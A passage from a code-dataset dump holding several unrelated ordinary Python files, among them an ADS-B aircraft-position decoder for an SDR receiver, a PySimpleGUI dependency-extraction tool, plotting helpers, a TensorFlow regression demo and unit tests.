)\n \n \n # ICAO address ( airplane address )\n aa1 = msg[1]\n aa2 = msg[2]\n aa3 = msg[3]\n \n \n # Get DF 17 (ADSB) extended squitter types\n metype = msg[4] >> 3 # extended squitter message type\n mesub = msg[4] & 7\n \n \n # Decode extended squitter, ignore all other messages\n if ( (msgtype == 17) and crcok ):\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found DF-17 packet\\n\"\n sys.__stdout__.write(strp)\n log.write(strp)\n \n addr = (aa1 << 16 ) | (aa2 << 8) | aa3\n \n # Add plane address to plane_list\n if ( addr in plane_list ):\n plane = plane_list[addr]\n else:\n plane = Plane(addr)\n plane_list[addr] = plane\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found new plane (ICAO: %x)!\\n\" % addr\n sys.__stdout__.write(strp)\n log.write(strp)\n if ( len(plane_list) == 1):\n print(\"Found %d plane\" % len(plane_list))\n \n else:\n print(\"Found %d planes\" % len(plane_list))\n \n if ( metype >=1 and metype <= 4 ):\n aircraft_type = metype - 1\n flight_index = np.array( [ msg[5] >> 2,\n ((msg[5]&3)<<4)|(msg[6]>>4),\n ((msg[6]&15)<<2)|(msg[7]>>6),\n msg[7]&63,\n msg[8]>>2,\n ((msg[8]&3)<<4)|(msg[9]>>4),\n ((msg[9]&15)<<2)|(msg[10]>>6),\n msg[10]&63] )\n \n flightnum = ais_charset[ flight_index ]\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found flight number %s for plane %x!\\n\" % (''.join(flightnum), addr)\n \n sys.__stdout__.write(strp)\n log.write(strp)\n \n plane.addplanetype( aircraft_type )\n plane.addflightnum( \"\".join( flightnum ) )\n elif ( metype >= 9 and metype <= 18 ):\n \n # latitude and longitude are in CPR format\n # here we implement the global decoding described in section 5.3.1:\n # http://adsb.tc.faa.gov/WG3_Meetings/Meeting29/1090-WP29-07-Draft_CPR101_Appendix.pdf\n # see also:\n # https://sites.google.com/site/adsbreceiver/\n # http://www.lll.lu/~edward/edward/adsb/DecodingADSBposition.html\n # http://aviation.stackexchange.com/questions/3707/ads-b-compact-position-report-nl-function\n \n \n isodd = msg[6] & (1<<2);\n lat_enc = ((msg[6] & 3) << 15) | (msg[7] << 7) | (msg[8] >> 1); \n lon_enc = ((msg[8] & 1) << 16) | (msg[9] << 8) | msg[10];\n \n if (isodd):\n plane.lat1 = lat_enc\n plane.lon1 = lon_enc\n plane.time1 = time.time()\n \n if (plane.time0 == -1):\n return\n else:\n plane.lat0 = lat_enc\n plane.lon0 = lon_enc\n plane.time0 = time.time()\n \n if (plane.time1 == -1):\n return\n \n if ( abs( plane.time0 - plane.time1 ) <= 10):\n decodeCPR( plane )\n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found position (%f,%f) for plane %x!\\n\" % (plane.position[0], plane.position[1], addr)\n sys.__stdout__.write(strp)\n log.write(strp)\n sys.stdout.flush()\n \n elif ( metype == 19 and mesub >=1 and mesub <= 4 ):\n if ( mesub == 1 or mesub == 2):\n ew_dir = (msg[5]&4) >> 2;\n ew_velocity = ((msg[5]&3) << 8) | msg[6];\n ns_dir = (msg[7]&0x80) >> 7;\n ns_velocity = ((msg[7]&0x7f) << 3) | ((msg[8]&0xe0) >> 5);\n vert_rate_source = (msg[8]&0x10) >> 4;\n vert_rate_sign = (msg[8]&0x8) >> 3;\n vert_rate = ((msg[8]&7) << 6) | ((msg[9]&0xfc) >> 2);\n # Compute velocity and angle from the two speed components. \n velocity = sqrt(ns_velocity*ns_velocity+ew_velocity*ew_velocity);\n if (velocity):\n ewv = ew_velocity;\n nsv = ns_velocity;\n\n if (ew_dir): ewv *= -1;\n if (ns_dir): nsv *= -1;\n heading = -arctan2(ewv,nsv);\n \n # We don't want negative values but a 0-360 scale. \n if (heading < 0):\n heading += 2 * np.pi;\n else:\n heading = 0;\n plane.heading = heading\n \n if ( mesub == 3 or mesub == 4):\n plane.heading = (360 / 128) * (((msg[5] & 3) << 5) | (msg[6] >> 3)) * np.pi / 180;\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" found plane angle %f degree for plane %x!\\n\" % (plane.heading * 180.0 / np.pi, addr)\n sys.__stdout__.write(strp)\n log.write(strp)\n sys.stdout.flush()\n\n\ndef sdr_read( Qin, sdr, N_samples, stop_flag ):\n \n t0 = time.time()\n while ( not stop_flag.is_set() ):\n data_chunk = abs(sdr.read_samples(N_samples)) # get samples \n Qin.put( data_chunk ) # append to list\n\n sdr.close()\n \n\ndef signal_process( Qin, source, functions, plot, log, stop_flag ):\n\n detectPreamble = functions[0]\n data2bit = functions[1]\n \n b = 0\n plane_list = {};\n while( not stop_flag.is_set() ):\n \n # Get streaming chunk\n chunk = Qin.get();\n \n strp = time.strftime(\"%H:%M:%S\", time.localtime()) + \" looking for packets...\\n\"\n sys.__stdout__.write(strp)\n log.write(strp)\n \n idx_preamble = detectPreamble(chunk)\n \n for n in idx_preamble:\n bits = data2bit(chunk[n:(n+16+MODES_LONG_MSG_BITS*2)])\n msg = bit2byte( bits )\n decodeModesMessage( msg, plane_list, log )\n \n # Update map:\n lat = []\n lon = []\n heading = []\n flightnum = []\n for addr in plane_list:\n plane = plane_list[addr]\n (mx, my) = LatLonToMeters(plane.position[0],plane.position[1])\n lat.append( my )\n lon.append( mx )\n heading.append( plane.heading )\n flightnum.append( plane.flightnum )\n \n source.data['lat'] = lat\n source.data['lon'] = lon\n source.data['heading'] = heading\n source.data['flightnum'] = flightnum\n \n push_notebook()\n Qin.queue.clear()\n \n log.close()\n \n \ndef LatLonToMeters(lat, lon ):\n #\"Converts given lat/lon in WGS84 Datum to XY in Spherical Mercator EPSG:900913\"\n originShift = 2 * math.pi * 6378137 / 2.0\n mx = lon * originShift / 180.0\n my = math.log( math.tan((90 + lat) * math.pi / 360.0 )) / (math.pi / 180.0)\n\n my = my * originShift / 180.0\n return mx, my\n\n \ndef rt_flight_radar( fs, center_freq, gain, N_samples, pos_ref, functions ):\n\n #clear_output()\n #time.sleep(1)\n # create an input output FIFO queues\n Qin = queue.Queue()\n \n # create a pyaudio object\n sdr = RtlSdr()\n sdr.sample_rate = fs # sampling rate\n sdr.center_freq = center_freq # 1090MhZ center frequency\n sdr.gain = gain\n \n # initialize map\n\n # Berkeley (lat, lon) = (37.871853, -122.258423)\n \n (mx_d, my_d) = LatLonToMeters(pos_ref[0]-0.2, pos_ref[1]-0.2)\n (mx_u, my_u) = LatLonToMeters(pos_ref[0]+0.2, pos_ref[1]+0.2)\n \n plot = figure(x_range=(mx_d, mx_u), y_range=(my_d, my_u),\n x_axis_type=\"mercator\", y_axis_type=\"mercator\")\n plot.add_tile(get_provider('CARTODBPOSITRON'))\n\n plot.title.text = \"Flight Radar\"\n\n # create lat, longitude source\n source = ColumnDataSource(\n data=dict(\n lat=[],\n lon=[],\n heading = [],\n flightnum = []\n )\n )\n \n # create plane figure\n oval1 = Oval( x = \"lon\", y = \"lat\", width=3000, height=700, angle= \"heading\", fill_color=\"blue\", line_color=\"blue\")\n oval2 = Oval( x = \"lon\", y = \"lat\", width=1000, height=7000, angle= \"heading\", fill_color=\"blue\", line_color=\"blue\")\n text = Text( x = \"lon\", y = \"lat\", text_font_size=\"10pt\", text=\"flightnum\", angle= \"heading\", text_color=\"red\")\n \n plot.add_glyph(source, oval1)\n plot.add_glyph(source, oval2)\n plot.add_glyph(source, text)\n\n output_notebook()\n handle = show(plot,notebook_handle=True)\n \n # initialize write file\n log = open('rtadsb_log','a')\n \n # initialize stop_flag\n stop_flag = threading.Event()\n\n # initialize threads\n t_sdr_read = threading.Thread(target = sdr_read, args = (Qin, sdr, N_samples, stop_flag ))\n t_signal_process = threading.Thread(target = signal_process, args = ( Qin, source, functions, plot, log, stop_flag))\n \n # start threads\n t_sdr_read.start()\n t_signal_process.start()\n\n return stop_flag\n","sub_path":"rtadsb.py","file_name":"rtadsb.py","file_ext":"py","file_size_in_byte":15367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156584725","text":"import sys\r\nimport PySimpleGUI as sg\r\nfrom OutputWindow import EmbeddedOutputWindow, stdOutputWrapper\r\n\r\nfrom FetchCr import FetchCrs\r\nfrom ParseCRs import ParseCRs\r\nfrom MakeCvsLattix import MakeCvsLattix\r\nfrom MakeCvsTable import MakeCvsTable\r\nfrom MakeDotFile import MakeDotFile\r\nfrom Report_dsp import makeDspReport\r\nfrom DDproducts import products\r\n\r\nsg.change_look_and_feel( 'Dark2' )\r\n\r\n# # Column 1 layout\r\n\r\nmaxKeyLength = 0\r\nfor prodKey in products.keys() :\r\n\tmaxKeyLength = max( maxKeyLength, len( prodKey ) )\r\n\r\ncolum1Layout = []\r\nfor prodKey, prodVal in products.items() :\r\n\tif len( prodVal ) > 58 :\r\n\t\tshortVal = '...' + prodVal[-55:] \r\n\telse :\r\n\t\tshortVal = prodVal\r\n\t\t\r\n\tcolum1Layout.append( [\r\n\t\t\t\t\t\t sg.Text( prodKey, justification = 'right', size = ( maxKeyLength + 1, 1 ) ),\r\n\t sg.InputText( shortVal, tooltip=prodVal, size = ( 60, 15 ), justification = 'left', disabled = True , font = 'Courier' )\r\n\t ] )\r\n\r\n# # Column 2 layout\r\n\r\noutTextField = EmbeddedOutputWindow( key = 'outputField', size = ( 120, 35 ), autoscroll = True )\r\n\r\ncolum2Layout = [ [ sg.Button( \"Fetch CR's\", key = 'fetchBtn' ), sg.Button( \"Parse CR's\", key = 'parseBtn' ) ],\r\n\t\t\t\t [ sg.Checkbox( \"Unconditional fetch\", key = 'forceFetch' ) ],\r\n\t\t\t\t [ sg.Text( '_' * 30 ) ],\r\n\t\t\t\t [ sg.Button( 'Make CSV for Lattix', key = 'makeLattix', size = ( 23, None ) ), sg.InputText( key = 'pathLattix' , default_text = 'lattix.csv' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Button( 'Make simple matrix CSV', key = 'makeMatrix', size = ( 23, None ) ), sg.InputText( key = 'pathMatrix' , default_text = 'dd.csv' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Button( 'Make DSP report', key = 'makeReport', size = ( 23, None ) ), sg.InputText( key = 'pathRepport', default_text = 'Report.csv' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Button( 'Make dot file', key = 'makeDotfile', size = ( 23, None ) ), sg.InputText( key = 'pathDotfile', default_text = 'allDeps.dot' ), sg.FileSaveAs() ],\r\n\t\t\t\t [ sg.Exit()],\r\n\t\t\t\t [ outTextField ],\r\n\t\t\t ]\r\n\r\n# Create the Window\r\ncolum1 = sg.Column( colum1Layout , scrollable = True, vertical_scroll_only = True )\r\ncolum2 = sg.Column( colum2Layout )\r\n\r\n\r\nlayout = [\r\n\t\t\t[ colum1, colum2 ]\r\n\t\t ]\r\n\r\nwindow = sg.Window( 'Config record dep extractor', layout, resizable = True )\r\n\r\n# Event Loop to process \"events\" and get the \"values\" of the inputs\r\n\r\ndef PassiveUpdate() :\r\n\twindow.Read( timeout = 0 )\r\n\r\nsys.stdout = stdOutputWrapper( sys.stdout, outTextField.Print, PassiveUpdate )\r\nsys.stderr = stdOutputWrapper( sys.stderr, outTextField.PrintErr, PassiveUpdate )\r\n\r\n\r\ndef StartStdoutputCapture():\r\n\tsys.stdout.ActivateGui()\r\n\tsys.stderr.ActivateGui()\r\n\r\n\r\ndef EndStdoutputCapture():\r\n\tsys.stdout.DeactivateGui()\r\n\tsys.stderr.DeactivateGui()\r\n\r\n\r\nwhile True:\r\n\tevent, values = window.read()\r\n\tif event in ( None, 'Exit' ): # if user closes window or clicks cancel\r\n\t\tbreak\r\n\telif event == 'fetchBtn' :\r\n\t\tStartStdoutputCapture()\r\n\t\tFetchCrs( values[ 'forceFetch' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'parseBtn' :\r\n\t\tStartStdoutputCapture()\r\n\t\tParseCRs()\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeLattix' :\r\n\t\tStartStdoutputCapture()\r\n\t\tMakeCvsLattix( values[ 'pathLattix' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeMatrix' :\r\n\t\tStartStdoutputCapture()\r\n\t\tMakeCvsTable( values['pathMatrix'] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeReport' :\r\n\t\tStartStdoutputCapture()\r\n\t\tmakeDspReport( values[ 'pathRepport' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telif event == 'makeDotfile' :\r\n\t\tStartStdoutputCapture()\r\n\t\tMakeDotFile( values[ 'pathDotfile' ] )\r\n\t\tprint( \"Done\" )\r\n\t\tEndStdoutputCapture()\r\n\telse :\r\n\t\tprint( event, values )\r\n\r\nwindow.close()\r\n\r\nif __name__ == '__main__':\r\n\tpass\r\n","sub_path":"ConfigRecord_DependencyExtractor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"263433064","text":"from setuptools import setup\n\nREADME_file = open('README.rst')\nREADME = README_file.read()\nREADME_file.close()\n\nsetup(name='clifig',\n version='0.1',\n description='A simple prompt to modify config files.',\n long_description=README,\n keywords='ConfigParser command-line cli config configuration conf',\n classifiers=['License :: OSI Approved :: MIT License',\n 'Development Status :: 3 - Alpha',\n 'Operating System :: OS Independent',\n 'Topic :: Utilities'],\n url='https://github.com/andrewguenther/clifig',\n author='Andrew Guenther',\n author_email='guenther.andrew.j@gmail.com',\n license='MIT',\n packages=['clifig'],\n scripts=['bin/clifig']\n )\n","sub_path":"pypi_install_script/clifig-0.1.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"421531862","text":"from rohan.global_imports import *\n\ndef _plot(ax, coords, pos_columns, **plot_style):\n \"\"\" This function wraps Axes.plot to make its call signature the same for\n 2D and 3D plotting. The y axis is inverted for 2D plots, but not for 3D\n plots.\n\n Parameters\n ----------\n ax : Axes object\n The axes object on which the plot will be called\n coords : DataFrame\n DataFrame of coordinates that will be plotted\n pos_columns : list of strings\n List of column names in x, y(, z) order.\n plot_style : keyword arguments\n Keyword arguments passed through to the `Axes.plot(...)` method\n\n Returns\n -------\n Axes object\n \"\"\"\n if len(pos_columns) == 3:\n return ax.plot(coords[pos_columns[0]], coords[pos_columns[1]],\n zs=coords[pos_columns[2]], **plot_style)\n elif len(pos_columns) == 2:\n return ax.plot(coords[pos_columns[0]], coords[pos_columns[1]],\n **plot_style)\ndef plot_trajectories(traj,image, colorby='particle', mpp=None, label=False,\n cmap=None, ax=None, t_column=None,\n pos_columns=None, plot_style={},\n params_text={'ha':'center','va':'center'}, **kwargs):\n \"\"\"Plot traces of trajectories for each particle.\n Optionally image it on a frame from the video.\n\n Parameters\n ----------\n traj : DataFrame\n The DataFrame should include time and spatial coordinate columns.\n colorby : {'particle', 'frame'}, optional\n mpp : float, optional\n Microns per pixel. If omitted, the labels will have units of pixels.\n label : boolean, optional\n Set to True to write particle ID numbers next to trajectories.\n image : ndarray, optional\n Background image, default None\n cmap : colormap, optional\n This is only used in colorby='frame' mode. Default = mpl.cm.winter\n ax : matplotlib axes object, optional\n Defaults to current axes\n t_column : string, optional\n DataFrame column name for time coordinate. Default is 'frame'.\n pos_columns : list of strings, optional\n Dataframe column names for spatial coordinates. Default is ['x', 'y'].\n plot_style : dictionary\n Keyword arguments passed through to the `Axes.plot(...)` command\n\n Returns\n -------\n Axes object\n \n See Also\n --------\n plot_traj3d : the 3D equivalent of `plot_traj`\n \"\"\"\n import matplotlib as mpl\n import matplotlib.pyplot as plt\n from matplotlib.collections import LineCollection\n from rohan.dandage.plot.colors import get_cmap_subset\n# if cmap is None:\n# cmap = get_cmap_subset('binary',vmin=0.15,vmax=0.05)\n if t_column is None:\n t_column = 'frame'\n if pos_columns is None:\n pos_columns = ['x', 'y']\n if len(traj) == 0:\n raise ValueError(\"DataFrame of trajectories is empty.\")\n _plot_style = dict(linewidth=1)\n # Background image\n ax=plt.subplot() if ax is None else ax\n ax.imshow(image,cmap=get_cmap_subset('binary',vmin=0.2,vmax=0))\n # Trajectories\n \n \n# if colorby == 'particle':\n# # Unstack particles into columns.\n# unstacked = traj.set_index(['particle', t_column])[pos_columns].unstack()\n# for i, trajectory in unstacked.iterrows():\n# _plot(ax, mpp*trajectory, pos_columns, **_plot_style)\n# elif colorby == 'frame':\n# # Read http://www.scipy.org/Cookbook/Matplotlib/MulticoloredLine\n# x = traj.set_index([t_column, 'particle'])['x'].unstack()\n# y = traj.set_index([t_column, 'particle'])['y'].unstack()\n# color_numbers = traj[t_column].values/float(traj[t_column].max())\n# # logger.info(\"Drawing multicolor lines takes awhile. \"\n# # \"Come back in a minute.\")\n# for particle in x:\n# points = np.array(\n# [x[particle].values, y[particle].values]).T.reshape(-1, 1, 2)\n# segments = np.concatenate([points[:-1], points[1:]], axis=1)\n# lc = LineCollection(segments, cmap=cmap)\n# lc.set_array(color_numbers)\n# ax.add_collection(lc)\n# # ax.set_xlim(x.apply(np.min).min(), x.apply(np.max).max())\n# # ax.set_ylim(y.apply(np.min).min(), y.apply(np.max).max())\n# else: \n \n# if label:\n# unstacked = traj.set_index([t_column, 'particle'])[pos_columns].unstack()\n# first_frame = int(traj[t_column].min())\n# coords = unstacked.fillna(method='backfill').stack().loc[first_frame]\n# for particle_id, coord in coords.iterrows():\n# ax.text(*coord.tolist(), s=\"%d\" % particle_id,\n# **params_text)\n ax.set_xlim(0,image.shape[0])\n ax.set_ylim(0,image.shape[1])\n ax.set_ylim(ax.get_ylim()[::-1])\n return ax \n\ndef plot_properties_cell(cellcfg,df2,cols_colorby,colx='x',coly='y'):\n from rohan.dandage.stat.norm import rescale\n from rohan.dandage.plot.contour import plot_contourf\n ncols=4\n nrows=int(np.ceil(len(cols_colorby)/4))\n fig,axes=plt.subplots(nrows,ncols,\n# sharex=True,sharey=True,\n figsize=[ncols*4,nrows*4]\n )\n# metric_type='max'\n for axi,(colorby,ax) in enumerate(zip(cols_colorby,np.ravel(axes))):\n fig,ax=plot_contourf(df2[colx],df2[coly],\n rescale(df2[colorby]),\n ax=ax,\n fig=fig,\n cbar=True if ((axi+1) % 4)==0 else False,\n params_contourf={'cmap':'binary','vmin':0,'vmax':1,'corner_mask':False},)\n ax=df2.plot.scatter(x=colx,y=coly,color='green',\n s=10,\n alpha=0.5,\n ax=ax) \n ax.contour(np.load(cellcfg['cellbrightp']), [0.5], linewidths=1, linestyles='dashed',colors='cyan') \n ax.set_title(colorby)\n ax.invert_yaxis()\n ax.axis('equal')\n# ax.set_ylim(ax.get_ylim()[::-1])\n# ax.set_axis_off()\n plt.tight_layout()\n \ndef dist_signal(img,threshold=None,label_threshold=None,\n params_hist={},\n params_axvline={'color':'r','linestyle':'dashed'},\n ax=None):\n ax=plt.subplot() if ax is None else ax \n a=np.ravel(img)\n a = a[~np.isnan(a)]\n a=np.extract(a fmax:\n\t\tsmax = fmax\n\t\tfmax = list1[n2]\n\tif smax < list1[n2] y else \"小于\")\n\n# map,对sequence中的item依次执行function(item),将执行结果function(item)组成一个List返回\ntempX = [1, 2, 3, 4, 5]\nprint('map: ', list(map(lambda d: d**2, tempX)))\n\n\n# reduce(function,iterable[, initializer],)\n# function 需要2个参数,1个用于保存操作结果,另一个是每次迭代的元素\n# iterable 待迭代处理的集合\n# initializer 初始值,可以没有,相当于 集合 多了一个元素,第一个元素是initializer的值\n# 用传给 reduce 中的函数 function(有两个参数)先对集合中的第 1、2 个元素进行操作,得到的结果再与第三个数据用 function 函数运算,最后得到一个结果\ntempY = reduce(lambda d, y: d*2, tempX, 10)\nprint('reduce: ', tempY)\n\n\n# filter\ntempA = [1, 2, 3, 4, 5, 6, 7, 8, 9]\ntempZ = filter(lambda x: x % 2 == 1, tempA)\nprint(list(tempZ))\n\nlistT = [1, 2, 3, 4]\nt = reduce(lambda x, y: x*2, listT)\nprint(\"t: {}\".format(t))\n\n\ndef add(a, b):\n return a*2\n\nt1 = reduce(add, listT, 20)\nprint(\"t1: {}\".format(t1))\n","sub_path":"day5/lambda学习.py","file_name":"lambda学习.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"292471422","text":"# -*- coding: utf-8 -*-\n# import pandas as pd\nimport tensorflow as tf\nimport numpy as np\n\n# tf.logging.set_verbosity(tf.logging.ERROR) #日志级别设置成 ERROR,避免干扰\n# np.set_printoptions(threshold='nan') #打印内容不限制长度\n\nnp.random.seed(123)\nt_x = np.floor(10 * np.random.random([5]),dtype=np.float32) #造一组随机输入\nt_y = t_x * 3.0 + 8.0 # 根据输入计算输出\n'''\ndf = pd.read_csv('C:/Users/hey/Desktop/aecopd.csv', header=0, index_col=0)\nt_x = df[['pm25']]\nt_y = df[['event']]\n'''\n\nx = tf.placeholder(tf.float32) # 输入量,在 TensorFlow 中以占位符 placeholder 表示\ny = tf.placeholder(tf.float32)\na = tf.Variable(1.0) #输出量,在 TensorFlow 中以Variable 表示\nb = tf.Variable(1.0)\ncurr_y = x * a + b #定义关系\nloss = tf.reduce_sum(tf.square(curr_y - y)) #定义损失函数,实际输出数据和训练输出数据的方差\noptimizer = tf.train.GradientDescentOptimizer(0.001) #定义求解最小损失函数方法——梯度下降(Gradient descent),学习率0.001\n# optimizer = tf.train.GradientDescentOptimizer(0.00000001)\ntrain = optimizer.minimize(loss) #训练的结果是使得损失函数最小\n\n\nsess = tf.Session() #创建 Session\nsess.run(tf.global_variables_initializer()) #变量初始化\nfor i in range(3000):\n sess.run(train, {x:t_x, y:t_y})\nprint(sess.run([a,b,loss],{x:t_x, y:t_y}))\n\n''' 用误差精度控制迭代次数\nLOSS_MIN_VALUE = tf.constant(1e-2) #达到此精度的时候结束训练\nsess = tf.Session()\nsess.run(tf.global_variables_initializer())\nrun_count = 0\nlast_loss = 0\nwhile True:\n run_count = run_count+1\n sess.run(train, {x:t_x, y:t_y})\n curr_loss,is_ok = sess.run([loss,loss < LOSS_MIN_VALUE],{x:t_x, y:t_y})\n if last_loss == curr_loss:\n break\n last_loss = curr_loss\n if is_ok:\n break\nprint(\"运行%d 次,loss=%s\" % (run_count,curr_loss))\nprint(sess.run([a,b,loss],{x:t_x, y:t_y}))\n'''\n\nexit(0)","sub_path":"tensorflow-line-1.py","file_name":"tensorflow-line-1.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"218180595","text":"#!/usr/bin/env python3\r\n\r\nimport math\r\nimport os\r\n\r\ndef ordered_merge(*args,selector=[]):\r\n \"\"\"Vraci generator\"\"\"\r\n try:\r\n slovnik={key:iter(value) for key, value in enumerate(args)}\r\n for key in selector:\r\n yield next(slovnik.get(key))\r\n except NameError:\r\n return None\r\n\r\nclass TooManyCallsError(Exception):\r\n \"\"\"Vyjimka\"\"\"\r\n pass\r\n\r\ndef limit_calls(max_calls=2,error_message_tail=\"function \\\"pyth\\\" - called too often\"):\r\n \"\"\"Dekorator, ktery limituje pocty volani\"\"\"\r\n def _limit_calls(funkce):\r\n def __limit_calls(*args,**kwargs):\r\n try:\r\n if __limit_calls.calls= a[num] * max(abs(right - num), abs(num - left)):\n big = a[j] * max(abs(right - j), abs(j - left))\n num = j\n if abs(right - j) > abs(j - left):\n r = True\n l = False\n else:\n r = False\n l = True \n \n ans += big\n a[num] = -1\n \n if r:\n right -= 1\n if l:\n left += 1\n \nprint(ans) \n","sub_path":"contest/abc163/e.py","file_name":"e.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510071028","text":"from .framework import BaseTestCase\nfrom datetime import datetime\nfrom datetime import timedelta\n\nfrom pyjedi.pb import common_pb2\n\nfrom jedi.libs.utils.dt import UTC_TZ\nfrom jedi.models.consts import ClassType\nfrom jedi.models.onlineclass.consts import PublishStatus\nfrom jedi.models.onlineclass.consts import ClassStatus, ClassStatusInfo\n\n\nclass TestOpenClass(BaseTestCase):\n\n def create_openclass(\n self, course_id='154', lesson_id='344', teacher_id='3324',\n provider=common_pb2.XUEDIANYUN, description='jedi test description',\n img_src='jedi test img_src', img_src_mobile='jedi test img_src_mobile',\n start_age=8, end_age=12, students_init_show=5, allowed_channel_ids=['1', '9', '7'],\n start_time=datetime.now(tz=UTC_TZ) + timedelta(days=3),\n exp_status_code=common_pb2.OK):\n\n result = self.add_timeslot(start_time=start_time, teacher_id=teacher_id)\n timeslot_id = result.timeslot.id\n\n result = self.jedi_client.create_openclass(\n course_id=course_id,\n lesson_id=lesson_id,\n timeslot_id=timeslot_id,\n provider=provider,\n description=description,\n img_src=img_src,\n img_src_mobile=img_src_mobile,\n start_age=start_age,\n end_age=end_age,\n students_init_show=students_init_show,\n allowed_channel_ids=allowed_channel_ids,\n metadata=self.metadata)\n\n assert result.status_code == exp_status_code\n opc_id = result.openclass.id\n\n if (exp_status_code == common_pb2.OK):\n response = self.jedi_client.get_openclass(opc_id, metadata=self.metadata)\n assert response.openclass.id == opc_id\n assert response.openclass.course_id == course_id\n assert response.openclass.lesson_id == lesson_id\n assert response.openclass.teacher_id == teacher_id\n assert response.openclass.schedule_time.day == start_time.day\n assert response.openclass.schedule_time.hour == start_time.hour\n assert response.openclass.schedule_time.minute == start_time.minute\n assert response.openclass.status == ClassStatus.created\n assert response.openclass.status_info == ClassStatusInfo.none\n assert response.openclass.type == ClassType.open_class\n assert response.openclass.provider == provider\n assert response.openclass.description == description\n assert response.openclass.img_src == img_src\n assert response.openclass.img_src_mobile == img_src_mobile\n assert response.openclass.start_age == start_age\n assert response.openclass.end_age == end_age\n assert response.openclass.students_init_show == students_init_show\n assert response.openclass.publish_status == PublishStatus.drafted\n assert response.openclass.allowed_channel_ids == allowed_channel_ids\n\n def test_create_openclass_with_all_params_should_be_ok(self):\n self.create_openclass()\n\n def test_create_openclass_course_id_is_null_should_be_value_error(self):\n self.create_openclass(course_id='', exp_status_code=common_pb2.VALUE_ERROR)\n\n def test_create_openclass_lesson_id_is_null_should_be_value_error(self):\n self.create_openclass(course_id='', exp_status_code=common_pb2.VALUE_ERROR)\n\n def test_create_openclass_description_is_none_should_be_ok(self):\n self.create_openclass(description='', exp_status_code=common_pb2.OK)\n\n def test_create_openclass_img_src_is_none_should_be_ok(self):\n self.create_openclass(img_src='', img_src_mobile='', exp_status_code=common_pb2.OK)\n\n def test_create_openclass_start_age_zero_should_be_ok(self):\n self.create_openclass(start_age=0, exp_status_code=common_pb2.OK)\n\n def test_create_openclass_end_age_negative_should_be_ok(self):\n self.create_openclass(end_age=10, exp_status_code=common_pb2.OK)\n\n def test_create_openclass_students_init_show_negative_should_be_ok(self):\n self.create_openclass(students_init_show=0, exp_status_code=common_pb2.OK)\n\n def test_create_openclass_allowed_channel_ids_is_none_should_be_ok(self):\n self.create_openclass(allowed_channel_ids=[], exp_status_code=common_pb2.OK)\n\n def test_create_openclass_with_duobeiyun_should_be_ok(self):\n self.create_openclass(provider=common_pb2.DUOBEIYUN)\n\n def test_create_openclass_multi_allowed_channel_ids_should_be_ok(self):\n self.create_openclass(allowed_channel_ids=['7'])\n","sub_path":"jedi/apitests/test_openclass_create.py","file_name":"test_openclass_create.py","file_ext":"py","file_size_in_byte":4555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"35721485","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDefines unit tests for :mod:`colour.algebra.matrix` module.\n\"\"\"\n\nfrom __future__ import division, unicode_literals\n\nimport numpy as np\nimport sys\n\nif sys.version_info[:2] <= (2, 6):\n import unittest2 as unittest\nelse:\n import unittest\n\nfrom colour.algebra import is_identity\n\n__author__ = 'Colour Developers'\n__copyright__ = 'Copyright (C) 2013 - 2015 - Colour Developers'\n__license__ = 'New BSD License - http://opensource.org/licenses/BSD-3-Clause'\n__maintainer__ = 'Colour Developers'\n__email__ = 'colour-science@googlegroups.com'\n__status__ = 'Production'\n\n__all__ = ['TestIsIdentity']\n\n\nclass TestIsIdentity(unittest.TestCase):\n \"\"\"\n Defines :func:`colour.algebra.matrix.is_identity` definition unit tests\n methods.\n \"\"\"\n\n def test_is_identity(self):\n \"\"\"\n Tests :func:`colour.algebra.matrix.is_identity` definition.\n \"\"\"\n\n self.assertTrue(\n is_identity(np.array([1, 0, 0, 0, 1, 0, 0, 0, 1]).reshape(3, 3)))\n self.assertFalse(\n is_identity(np.array([1, 2, 0, 0, 1, 0, 0, 0, 1]).reshape(3, 3)))\n self.assertTrue(\n is_identity(np.array([1, 0, 0, 1]).reshape(2, 2), n=2))\n self.assertFalse(\n is_identity(np.array([1, 2, 0, 1]).reshape(2, 2), n=2))\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"colour/algebra/tests/tests_matrix.py","file_name":"tests_matrix.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"559432667","text":"import re\nimport os\nj=0\npath=\"/home/fereshteh/kaist/sanitized_annotations/\"\nfor filename in sorted(os.listdir(path)):\n \n filename3=filename\n filename3 = re.sub('.txt',\".png\",str(filename3))\n filename2 = re.sub('_',\"/\",str(filename))\n filename = re.sub('/I',\"/visible/I\",str(filename2))\n filename = 